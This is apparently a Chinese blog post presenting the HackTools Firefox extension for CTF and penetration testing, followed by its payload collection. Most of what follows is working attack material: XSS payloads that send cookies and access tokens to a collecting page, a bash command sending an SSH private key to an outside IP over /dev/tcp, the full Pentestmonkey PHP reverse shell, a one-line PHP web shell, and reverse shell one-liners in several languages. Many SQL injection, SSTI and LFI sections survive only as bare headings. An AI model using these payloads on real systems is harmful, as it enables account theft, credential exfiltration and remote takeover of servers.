貓寧~~~
firefox插件hacktools地址:
https://addons.mozilla.org/zh-CN/firefox/addon/hacktools/
HackTools由Ludovic Coulon和Riadh BoUCHAHOUA創建。
這是他們插件製作的初衷:
我們是兩個對計算機安全非常感興趣的學生,這個想法是在我們的CTF培訓期間出現的,我們注意到我們經常使用相同的工具(繪製一個shell,用php反向shell,Base64編碼等等),這就是當我們想到將大多數工具和有效負載組合在一個地方的想法時,一個簡單的Web應用程序就可以完成這項工作,但是來回移動相當令人沮喪,這就是爲什麼我們想直接在瀏覽器中實現一個擴展
由此,我們可以知道,一個滲透測試工具的目的,是提高生產力,有的時候,一種聚合也是一種創新。
1~xss相關payload
Data grabber for XSS
Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page.
<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
<script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script>
<script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script>
XSS in HTML/Applications
Basic Payload
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
Img tag payload
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert("XSS");>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
XSS in Markdown
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)
XSS in SVG (short)
<svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
Bypass word blacklist with code evaluation
eval('ale'+'rt(0)');
Function('ale'+'rt(1)')();
new Function`alert`6``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`alert(14)```;
2~sql注入payload
Generic SQL Injection Payloads
Time-Based
Generic Error Based Payloads
Authentication Based Payloads
Order by and UNION Based Payloads
3~Template Injections (SSTI),模板注入
Template injection allows an attacker to include template code into an existant (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages
Jinja2 ( Flask / Django )
File reading
Write into a file
4~LFI,本地文件包含
Directory traversal
PHP Wrapper php://file
PHP Wrapper php://filter
Useful LFI files
Linux
Apache
MySQL
Windows
Bash Upload
# Upload file over HTTP (require HTTP service running on the attacker machine)
# Exfiltrate file over TCP# Listen with Netcat on port 1337 + output redirection
bash -c 'cat id_rsa > /dev/tcp/10.10.164.167/1337'
Bash Download
# Send via netcat
# Download file on the other machine
Netcat
# Upload payloadPython
# Python3 HTTP ServerSCP
# Upload from local host to remote computerSUID Commands
What version of the system ?
What is its kernel version ?
What is the environment variables ?
Service settings, there is any wrong allocation?
Is there any cron jobs ?
Other users host communication with the system ?
How to port forwarding ?
TAR wildcard cronjob privilege escalation
Python spawn shell
Fully Interactive TTY
All the steps to stabilize your shell
OS system spawn shell
Bash spawn shell
Perl spawn shell
Python spawn shell
Lua spawn shell
IRB spawn shell
VI spawn shell
VI(2) spawn shell
Nmap spawn shell
8~PHP Reverse Shell
Pentestmonkey's reverse shell
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]
set_time_limit (0);
$VERSION = "1.0";
$ip = ''; // You have changed this
$port = ; // And this
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string
";
}
}
?>
Basic RCE
Obfuscate PHP Web Shell
<?=`$_POST[0]`?>
9~Reverse shell
A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the local host.
bash -c 'exec bash -i &>/dev/tcp/192.168.100.100/100 <&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.100.100 100 >/tmp/f
php -r '$sock=fsockopen(getenv("192.168.100.100"),getenv("100"));exec("/bin/sh -i <&3 >&3 2>&3");'
perl -e 'use Socket;$i="$ENV{192.168.100.100}";$p=$ENV{100};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import sys,socket,os,pty;s=socket.socket() s.connect((os.getenv("192.168.100.100"),int(os.getenv("100")))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["192.168.100.100"],ENV["100"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
TF=$(mktemp -u); mkfifo $TF && telnet 192.168.100.100 100 0<$TF | /bin/sh 1>$TF
over~~~